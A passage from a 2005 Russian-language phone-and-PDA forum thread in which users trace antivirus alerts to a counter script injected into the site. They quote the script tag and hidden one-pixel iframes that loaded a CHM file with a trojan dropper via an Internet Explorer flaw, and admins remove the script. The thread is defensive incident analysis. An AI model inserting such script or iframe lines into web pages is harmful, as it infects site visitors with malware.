Вход в Зоопарк ручных компьютеров
gps мониторинг, транспортная логистика, gps слежение
Господа, заходя на форум получаю вирус
"Карманная" версия Базара
На страницу Пред.  1, 2, 3, 4, 5, 6  След.
 
Начать новую тему   Ответить на тему    Список Базаров Форумы Handy.ru -> Жалобная книга
Предыдущая тема :: Следующая тема  
Автор Сообщение
Alex Muratov

Гуру


Зарегистрирован: 25.11.2001
Сообщения: 2491
Откуда: Оттуда
СообщениеДобавлено: Пн Апр 18, 2005 4:11    Заголовок сообщения: Ответить с цитатой
ага, тормозит не по детски.... Sad
_________________
Cingular 8525 (alive!) + 2Gb microSD, и на полочке кучка пыльных PDA
Вернуться к началу
Посмотреть профиль Отправить личное сообщение
Alex Muratov

Гуру


Зарегистрирован: 25.11.2001
Сообщения: 2491
Откуда: Оттуда
СообщениеДобавлено: Пн Апр 18, 2005 4:40    Заголовок сообщения: Ответить с цитатой
Exclamation
вот из-за этих счетчиков и проблема. "зверька" я нашел - достаточно из HTML удалить следующий скрипт, и все возвращается к норме.

Цитата:

<script language="JavaScript" src="http://counter-traffic.com/G7/anticheatsys.php?id=36722" type="text/JavaScript"></script>


P.S.
вот не увлекались бы так рекламой, глядишь и форуму жить было бы легче...
_________________
Cingular 8525 (alive!) + 2Gb microSD, и на полочке кучка пыльных PDA
Вернуться к началу
Посмотреть профиль Отправить личное сообщение
Alex Muratov

Гуру


Зарегистрирован: 25.11.2001
Сообщения: 2491
Откуда: Оттуда
СообщениеДобавлено: Пн Апр 18, 2005 4:52    Заголовок сообщения: Ответить с цитатой
вопрос к админам: откуда взялся этот скрипт в странице? его единственная задача - закачать троян на комп при визите сайта. Я вижу несколько вариантов:
1. Сайт был хакнут, но все что было сделано - вставлены ссылки на этот вредноносный сайт (сомнительно, если сайт хакают, то это как правило сразу видно от распирающего самомнения кул хацкера, хотя кто знает...)
2. Ссылка была вставлена преднамеренно (не хотелось бы так думать)

пока фантазии не хватает на другие варианты.
_________________
Cingular 8525 (alive!) + 2Gb microSD, и на полочке кучка пыльных PDA

Последний раз редактировалось: Alex Muratov (Пн Апр 18, 2005 6:03), всего редактировалось 1 раз
Вернуться к началу
Посмотреть профиль Отправить личное сообщение
Lietotajs

Гуру


Зарегистрирован: 15.01.2003
Сообщения: 1264
Откуда: Латвия
СообщениеДобавлено: Пн Апр 18, 2005 5:18    Заголовок сообщения: Ответить с цитатой
CRC писал(а):
Я в третий раз повторяю свою просьбу. У кого "визжит" антивирус - отпишите название вируса, на который ваш антивирус жалуется. Мне это очень поможет пофиксить проблему.

Заранее спасибо!

Exploit.HTML.Mht
_________________
Sony Xperia P, Samsung Galaxy Note 3 neo...
Вернуться к началу
Посмотреть профиль Отправить личное сообщение Отправить e-mail
Гость
СообщениеДобавлено: Пн Апр 18, 2005 6:12    Заголовок сообщения: Ответить с цитатой
Alex Muratov писал(а):
вопрос к админам: откуда взялся этот скрипт в странице? его единственная задача - закачать троян на комп при визите сайта.

Судя по всему не единственная. Там часть кода вполне реальный счетчик, просто в начале вставка <IFRAME SRC="http://www.globolook.com/v058/wow.html" WIDTH=1 HEIGHT=1></IFRAME>, которая грузит chm со злобным жабовским скриптом... Определенно дыра IE надо маляву в MS катать Smile
Вернуться к началу
Гость
СообщениеДобавлено: Пн Апр 18, 2005 6:22    Заголовок сообщения: Ответить с цитатой
Гоню, не скрипт там не разу. В том chm-е два файла xxx.html & dropper.exe, в xxx.html вызов компонента dropper.exe... но по любому это дыра IE, надо ж такую хрень пропускать...
Вернуться к началу
Alex Muratov

Гуру


Зарегистрирован: 25.11.2001
Сообщения: 2491
Откуда: Оттуда
СообщениеДобавлено: Пн Апр 18, 2005 6:24    Заголовок сообщения: Ответить с цитатой
ага, точно вставка ... в пустую страницу Laughing
там кроме этого кода больше ничего нет, просто редирект на <IFRAME SRC="http://www.tgp.la/or.html" WIDTH=1 HEIGHT=1></IFRAME>

и дальше пошли прыжки на другие сайты и в итоге загрузка и запуск инсталляторов троянов. типично вражеский скрипт, трудно поверить что это был легитимный счетчик.
_________________
Cingular 8525 (alive!) + 2Gb microSD, и на полочке кучка пыльных PDA
Вернуться к началу
Посмотреть профиль Отправить личное сообщение
AE

Гуру


Зарегистрирован: 21.08.2001
Сообщения: 1981
Откуда: Moscow, Russia
СообщениеДобавлено: Пн Апр 18, 2005 6:30    Заголовок сообщения: Ответить с цитатой
Alex Muratov писал(а):
Exclamation
вот из-за этих счетчиков и проблема. "зверька" я нашел - достаточно из HTML удалить следующий скрипт, и все возвращается к норме.
Попробуй теперь - я удалил этот счетчик. Это хакнули не хенди, хакнули сайт-счетчик.
Alex Muratov писал(а):
P.S.
вот не увлекались бы так рекламой, глядишь и форуму жить было бы легче...
Ну, на мой взгляд идеальный сайт это сайт содержащий только свою рекламу. Однако в данном случае вопрос не к CRC (он взялся администрить форум) и тем более не ко мне (я только подтягиваю "карманную" версию и лишь очень временно имею права админа). Сколько и какой рекламы будет на странице определяют более другие люди Wink

Что касается вопроса "откуда скрипт взялся" - он был явно внесен вручную. Кем - я конечно "инцендент возбужу" - но ответа вы, да и я наверное тоже - не узнаете. Smile
Тем более что это не ошибка и тем более не преднамеренный вред - просто счетчик оказался такой... ненадежный...
Вернуться к началу
Посмотреть профиль Отправить личное сообщение Отправить e-mail Посетить сайт автора
Гость
СообщениеДобавлено: Пн Апр 18, 2005 6:33    Заголовок сообщения: Ответить с цитатой
Alex Muratov писал(а):
типично вражеский скрипт, трудно поверить что это был легитимный счетчик.

Прав, однозначно! Прощелкал загрузгу первой (пустой) страницы.... А на вторую страницу они вставили счетчик для подсчета статистики загрузок вражеского кода... Всем нужна статистика, однако Smile
Вернуться к началу
AE

Гуру


Зарегистрирован: 21.08.2001
Сообщения: 1981
Откуда: Moscow, Russia
СообщениеДобавлено: Пн Апр 18, 2005 6:34    Заголовок сообщения: Ответить с цитатой
Anonymous писал(а):
Гоню, не скрипт там не разу. В том chm-е два файла xxx.html & dropper.exe, в xxx.html вызов компонента dropper.exe... но по любому это дыра IE, надо ж такую хрень пропускать...

Пропустили самое начало: на нормально запатченной машине проблем с этим вирусом нет. Ни мне, ни CRC воспроизвести это не удалось.
Ноут для эксперимента я домой приволок, конечно - но ломать его не хочется, раз уж проблема выявилась (а кстати - она выявилась? Больше такой ссылки я нигде на сайте не нашел) Так что - ставьте сервиспаки. А в MS писать уже поздно в любом случае...
Вернуться к началу
Посмотреть профиль Отправить личное сообщение Отправить e-mail Посетить сайт автора
BioByte

Гуру


Зарегистрирован: 19.08.2002
Сообщения: 676
СообщениеДобавлено: Пн Апр 18, 2005 6:42    Заголовок сообщения: Ответить с цитатой
AE писал(а):
Пропустили самое начало: на нормально запатченной машине проблем с этим вирусом нет.

Ну у меня тоже небыло Wink, просто достал попап NetCaptor-а, в котором он отказывался грузить данный chm. Проверять не стал, поверил на слово что может, не до таких эксперементов мне сейчас Smile
Кстати, спасибо, все ОК, больше тоянов нет...
P.S. Гвест выше, это был я...
_________________
h2210 SD(256M + 1G) && CF256; SanDisk Wi-Fi+128
Вернуться к началу
Посмотреть профиль Отправить личное сообщение
AE

Гуру


Зарегистрирован: 21.08.2001
Сообщения: 1981
Откуда: Moscow, Russia
СообщениеДобавлено: Пн Апр 18, 2005 6:45    Заголовок сообщения: Ответить с цитатой
Спасибо Alex'у, за то что он нашел эту гадскую строчку. И особенное спасибо за то, что мне не пришлось возиться с Altiris'ом и переналивать ноут Smile
Вернуться к началу
Посмотреть профиль Отправить личное сообщение Отправить e-mail Посетить сайт автора
Alex Muratov

Гуру


Зарегистрирован: 25.11.2001
Сообщения: 2491
Откуда: Оттуда
СообщениеДобавлено: Пн Апр 18, 2005 6:49    Заголовок сообщения: Ответить с цитатой
не за что Smile
просто я на днях возился с анализом подобной дряни, поэтому весь необходимый инструментарий был под рукой.

на счет того что на запатченной машине без антивируса проблемы нет, не уверен. У меня WinXP SP2 со всеми последними патчами и KAV таки ругается на попытку загрузки вражеских страниц. Другое дело что везде стоит антивирус, он то и "мешал" Wink
На SP1 садится эта дрняь мгновенно. На SP2 без антивируса не проверял, лень было создавать новый экземпляр VM (диск идти искать, целое дело Wink)
_________________
Cingular 8525 (alive!) + 2Gb microSD, и на полочке кучка пыльных PDA
Вернуться к началу
Посмотреть профиль Отправить личное сообщение
Alex Muratov

Гуру


Зарегистрирован: 25.11.2001
Сообщения: 2491
Откуда: Оттуда
СообщениеДобавлено: Пн Апр 18, 2005 7:08    Заголовок сообщения: Ответить с цитатой
2AE
все равно сомнения гложут, что эта строчка только с добрыми намеряниями появилась.

1. домен counter-traffic.com зарегистрирован только 9 марта 2005.
2. email владельцев lame@xxxengine.net (интересно, да? Smile)
3. согласно Google на нем только одна страница с этим скриптом. Если бы сайт хакнули недавно, у него остался бы кеш других страниц, а их нет.

так что пища к размышлению Wink
_________________
Cingular 8525 (alive!) + 2Gb microSD, и на полочке кучка пыльных PDA
Вернуться к началу
Посмотреть профиль Отправить личное сообщение
Lietotajs

Гуру


Зарегистрирован: 15.01.2003
Сообщения: 1264
Откуда: Латвия
СообщениеДобавлено: Пн Апр 18, 2005 7:09    Заголовок сообщения: Ответить с цитатой
Ура!
Пахоже что вылечили!
_________________
Sony Xperia P, Samsung Galaxy Note 3 neo...
Вернуться к началу
Посмотреть профиль Отправить личное сообщение Отправить e-mail
Показать сообщения:   
Начать новую тему   Ответить на тему    Список Базаров Форумы Handy.ru -> Жалобная книга Часовой пояс: GMT - 10
На страницу Пред.  1, 2, 3, 4, 5, 6  След.
Страница 5 из 6

 
Перейти:  
Вы не можете начинать темы
Вы не можете отвечать на сообщения
Вы не можете редактировать свои сообщения
Вы не можете удалять свои сообщения
Вы не можете голосовать в опросах
Вы не можете добавлять вложения в этом форуме
Вы можете просматривать вложения в этом форуме



Форумы Handy.ru 


Powered by phpBB © 2001 phpBB Group